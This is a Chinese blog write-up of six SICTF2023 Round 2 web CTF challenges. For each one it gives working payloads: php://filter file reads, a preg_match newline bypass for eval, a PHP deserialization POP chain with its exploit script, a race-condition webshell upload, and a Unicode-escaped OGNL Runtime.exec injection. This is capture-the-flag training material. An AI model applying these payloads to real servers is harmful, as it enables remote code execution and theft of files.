SICTF2023#Round2-WEB

已于 2023-09-11 16:55:11 修改
阅读量367 收藏 4
点赞数 1
文章标签: 前端 android
于 2023-09-10 17:28:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68113265/article/details/132790840
版权

目录

1、[签到]Include

2、Baby_PHP

 3、RCE

4、我全都要

5、你能跟得上我的speed吗

6、java-OGNL

1、[签到]Include
<?php
error_reporting(0);
if (isset($_GET['SICTF'])) {
    if ( substr($_GET["SICTF"], 0, 3) === "php" ) {
        echo "你好厉害呀~~~";
        include($_GET["SICTF"]);
    } 

    else {
        echo "你干嘛~~~";
    }
}else {
    highlight_file(__FILE__);
}

直接包含,flag在根目录

payload:

?SICTF=php://filter/convert.base64-encode/resource=/flag
2、Baby_PHP
<?php
highlight_file(__FILE__);
error_reporting(0);

$query = $_SERVER['QUERY_STRING'];

if (preg_match('/_|%5f|\.|%2E/i', $query)) {
    die('You are Hacker!');
}
if($_GET['k_e_y'] !=='123' && preg_match('/^123$/',$_GET['k_e_y'])){
    echo("You are will Win!<br>");
    if(isset($_POST['command'])){
        $command = $_POST['command'];
        if(!preg_match("/\~|\`|\@|\#|\\$|\%|\&|\*|\(|\)|\-|\+|\=|\{|\}|\[|\]|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i",$command)){
            eval($command);
        }
        else{
            echo("You are Hacker!");
        }
    }
}
else{
    echo("K_e_y is Errors!");
} K_e_y is Errors!

k_e_y不等于123同时又要满足123可以%0A来绕过preg_match

同时不能出现_和%5f可以空格替代

command就是无参命令执行

payload:

?k e y=123%0A
command=show_source(next(array_reverse(scandir(current(localeconv())))));
 3、RCE
<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
$code = str_replace("(","hacker",$code);
$code = str_replace(".","hacker",$code);
eval($code);

禁用(可以考虑直接包含

payload:

code=include $_POST[1]?>&1=php://filter/convert.base64-encode/resource=/flag
4、我全都要
<?php
highlight_file(__FILE__);

class B{
    public $pop;
    public $i;
    public $nogame;

    public function __destruct()
    {
        if(preg_match("/233333333/",$this->pop)){
            echo "这是一道签到题,不能让新生一直做不出来遭受打击";
        }
    }

    public function game(){
        echo "扣1送地狱火";
        if ($this->i = "1"){
            echo '<img src=\'R.jpg\'>';
            $this->nogame->love();
        }
    }

    public function __clone(){
        echo "必须执行";
        eval($_POST["cmd"]);
    }
}


class A{
    public $Aec;
    public $girl;
    public $boy;

    public function __toString()
    {
        echo "I also want to fall in love";
        if($this->girl != $this->boy && md5($this->girl) == md5($this->boy)){
            $this->Aec->game();
        }
    }


}


class P{
    public $MyLover;
    public function __call($name, $arguments)
    {
        echo "有对象我会在这打CTF???看我克隆一个对象!";
        if ($name != "game") {
            echo "打游戏去,别想着对象了";
            $this->MyLover = clone new B;
        }
    }


}


if ($_GET["A_B_C"]){
    $poc=$_GET["A_B_C"];
    unserialize($poc);
}

 pop链:由class B的__destruct触发class A的tostring

接着触发class B的game

然后触发class P的call

最后触发class B的clone

exp:

<?php
error_reporting(0);
class B{
    public $pop;
    public $i;
    public $nogame;

    public function __destruct()
    {
        if(preg_match("/233333333/",$this->pop)){
            echo "这是一道签到题,不能让新生一直做不出来遭受打击";
        }
    }

    public function game(){
        echo "扣1送地狱火";
        if ($this->i = "1"){
            echo '<img src=\'R.jpg\'>';
            $this->nogame->love();
        }
    }

    public function __clone(){
        echo "必须执行";
        eval($_POST["cmd"]);
    }
}


class A{
    public $Aec;
    public $girl="240610708";
    public $boy="QNKCDZO";

    public function __toString()
    {
        echo "I also want to fall in love";
        if($this->girl != $this->boy && md5($this->girl) == md5($this->boy)){
            $this->Aec->game();
        }
    }


}


class P{
    public $MyLover;
    public function __call($name, $arguments)
    {
        echo "有对象我会在这打CTF???看我克隆一个对象!";
        if ($name != "game") {
            echo "打游戏去,别想着对象了";
            $this->MyLover = clone new B;
        }
    }

}

$bb = new B;
$bb->pop = new A;
$bb->pop->Aec = new B;
$bb->pop->Aec->nogame = new P;
echo serialize($bb);

payload:

O:1:"B":3:{s:3:"pop";O:1:"A":3:{s:3:"Aec";O:1:"B":3:{s:3:"pop";N;s:1:"i";N;s:6:"nogame";O:1:"P":1:{s:7:"MyLover";N;}}s:4:"girl";s:9:"240610708";s:3:"boy";s:7:"QNKCDZO";}s:1:"i";N;s:6:"nogame";N;}

最后蚁剑连接

5、你能跟得上我的speed吗

一眼条件竞争,bp调大线程直接梭。选择null payloads 次数为continue

线程改200

一边上传木马文件1.php一边再去访问1.php

最后得flag 

6、java-OGNL
package com.example.pain.demos;
 
import ognl.Ognl;
import ognl.OgnlContext;
import ognl.OgnlException;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RestController;
 
@RestController
/* loaded from: pain.jar:BOOT-INF/classes/com/example/pain/demos/pain.class */
public class pain {
    @GetMapping({"/"})
    public String Welcome() {
        return "It's so beautiful , Litang.";
    }
 
    @GetMapping({"/start"})
    public String MyPain(String payload) throws OgnlException {
        if (dinner_waf.let_me_see_see(payload)) {
            OgnlContext ognlContext = new OgnlContext();
            Object ognl2 = Ognl.parseExpression(payload);
            Object value = Ognl.getValue(ognl2, ognlContext, ognlContext.getRoot());
            return (String) value;
        }
        return "Feel my pain";
    }
}

黑名单过滤了一些关键字,但是可以用Unicode绕过。

Java 语言内部是用 Unicode 表示字符,所以 Unicode 会被自动解析

接着再url编码,题目有url解码

(new java.io.BufferedReader(new java.io.InputStreamReader(@java.lang.Runtime@getRuntime().exec("cat /flag").getInputStream()))).readLine()
  • 使用 Java 的 Runtime 类的 exec 方法执行外部命令 "ls"(在 Unix/Linux 系统中用于列出目录内容)。
  • 获取命令的输出流并将其包装在 java.io.InputStreamReaderjava.io.BufferedReader 中。
  • 使用 readLine() 方法从命令的输出流中读取一行文本。

payload:

%5Cu0028%5Cu006e%5Cu0065%5Cu0077%5Cu0020%5Cu006a%5Cu0061%5Cu0076%5Cu0061%5Cu002e%5Cu006c%5Cu0061%5Cu006e%5Cu0067%5Cu002e%5Cu0050%5Cu0072%5Cu006f%5Cu0063%5Cu0065%5Cu0073%5Cu0073%5Cu0042%5Cu0075%5Cu0069%5Cu006c%5Cu0064%5Cu0065%5Cu0072%5Cu0028%5Cu006e%5Cu0065%5Cu0077%5Cu0020%5Cu006a%5Cu0061%5Cu0076%5Cu0061%5Cu002e%5Cu006c%5Cu0061%5Cu006e%5Cu0067%5Cu002e%5Cu0053%5Cu0074%5Cu0072%5Cu0069%5Cu006e%5Cu0067%5Cu005b%5Cu005d%5Cu007b%5Cu0022%5Cu0063%5Cu0061%5Cu0074%5Cu0020%5Cu002f%5Cu0066%5Cu006c%5Cu0061%5Cu0067%5Cu0022%5Cu007d%5Cu0029%5Cu0029%5Cu002e%5Cu0073%5Cu0074%5Cu0061%5Cu0072%5Cu0074%5Cu0028%5Cu0029

He@11
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
dm-round-robin.rar_V2
09-23
Round-robin path selector for Linux v2.13.6.
SICTF2023 Round2
miao25的博客
09-16 201
🎰 小位数直接当作已知数(爆破可出);Coppersmith’s Short-pad Attack & Related Message Attack(Franklin-Reiter攻击);MTP攻击;`small_roots`方法的`epsilon`参数
SICTF2023 Osint-wp
网安小菜鸡
01-20 562
社工
2023SICTF ROUND2 baby_heap
臭nana的博客
09-12 355
就是在申请堆块的时候会先从small bin中找有没有空闲的堆块,其中的bin,是根据main_arena和上申请堆块大小在small bin中的索引得到的,其实也是main_arena+xx,所以可以修改伪造其中有堆块,需要满足victim->bk->fd==victim,所以在堆上伪造就行了,有点像unlink,但是比它简单,最后就是和思路一样了,前面的思路也一样。思路三:在unsorted bin中伪造一个fake chunk,需要满足的条件是。
SICTF2023 misc-wp
网安小菜鸡
01-20 1257
misc杂项
2023 SICTF --- wp
3tefanie丶zhou的博客
01-19 4978
【观海者难为水,痴心者难为情,男女情爱之苦乐,不过是意中人变成了忆中人,心上人变成了枕边人。】
oppo_round1-数据集
03-30
oppo_round1-数据集
ip_vs_rr.rar_round-robin
09-14
Round-Robin Scheduling module.
xml-roundtrip-validator
04-15
xml往返验证器Go模块github.com/mattermost/xml-roundtrip-validator实现了Go的encoding/xml多个安全问题的缓解措施。 使用encoding/xml进行安全性至关重要的操作(例如XML签名验证和SAML)的应用程序可以使用...
Round-2-100-Days-Of-Code
03-27
Round-2-100-Days-Of-Code
Devathlon-2-2nd-Round
05-20
3名玩家对3名玩家,每组2个团队(帝国和叛军)在各自的飞船上 这些飞船配备了防护罩,防护罩在开始时具有完整的动力点 两个派别都试图破坏敌人的防护罩,以使他们自己的传器变得活跃 使用传器,玩家可以将自己...
round-trip-nmt
04-12
往返NMT预训练模型 en包含从en到另一种语言的所有预训练模型,反之亦然。 en内的所有模型均来自以下来源: 其他预训练模型 剧本 所有脚本都存储在目录scripts translation.py
Round-and-Round-Kit:UINavigationController 的 3D 旋转视图添加
06-11
2014 年 2 月更新这是一个相当古老的项目。 当我学习 Objective-C 时,我在玩 3D、swizzling 等。 您仍然可能会在这里找到一些有用的东西。 对于 3D 动画,在图层上设置 m34(透视)矩阵。 然后应用一些转换。描述向...
DataStorm-2nd-Round
03-28
DataStorm-2nd-Round
ai-challenge-4th-round-2nd-track2
04-12
AI Grand Challenge 4th Contest Stage 2 Track 2 API 在第四届大挑战赛第二阶段执行的模型已发布为API版本。 在排行榜上显示最高性能的模型是作为API版本创建的。 要求 使用以下命令安装所需的软件包。 pip ...
Aarambh-All Round Parent-crx插件
04-02
语言:English 一种保护年轻人免遭恐怖组织激进化的解决方案 一个智能的浏览器扩展程序,可以监视青少年在社交媒体平台上的活动,并在用户的父母/监护人有被暴力极端主义激怒的危险时提醒用户。如今,任何用户的家庭...
青少年ctf擂台挑战赛 2024 #round 1
最新发布
04-16
青少年ctf擂台挑战赛 2024 #round 1
kicad-round-tracks
05-29
KiCad圆轨道用于 KiCad 的基于细分的轨道舍入插件。 这个插件是基于朱利安洛亚科诺和安东尼Pintout。 我的贡献更新了算法,以便平等地应用细分,从而使轨道更平滑,间隙错误更少。 为获得最佳效果,请与此结合使用。...
OGeek_round1-数据集
03-29
用python定义一个函数,对输入的文件大小进行换算,统一返回“字节”数,最后结果四舍五入。 # 只考虑文件大小的单位为(M、MB、K、KB、G、GB),运行效果如下: # # 请输入文件大小:【7.3M】【7.3MB】 # 文件大小为:7654605B # # ------------------------------- # 请输入文件大小:【7.3K】【7.3KB】 # 文件大小为:7475B
06-09
好的,我可以为你编写这个函数。请看下面的代码: ```python def size_converter(size_str): size_str = size_str.upper() units = {'B': 1, 'KB': 1024, 'MB': 1024*1024, 'GB': 1024*1024*1024} unit = 1 for key in units.keys(): if key in size_str: unit = units[key] size_str = size_str.replace(key, '') size = float(size_str) * unit size = round(size) return size ``` 你可以在这个函数中传入一个字符串参数,它代表了文件大小,例如"7.3M"或"7.3MB"。然后,函数将会把这个字符串中的数字和单位分离出来,并将其转换为字节数。最后,函数会使用 Python 的 `round()` 函数将结果四舍五入,然后返回最终的字节数。 例如,如果你调用函数并传入参数 "7.3M",它将会返回 7654605。如果你传入参数 "7.3KB",它将会返回 7475。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值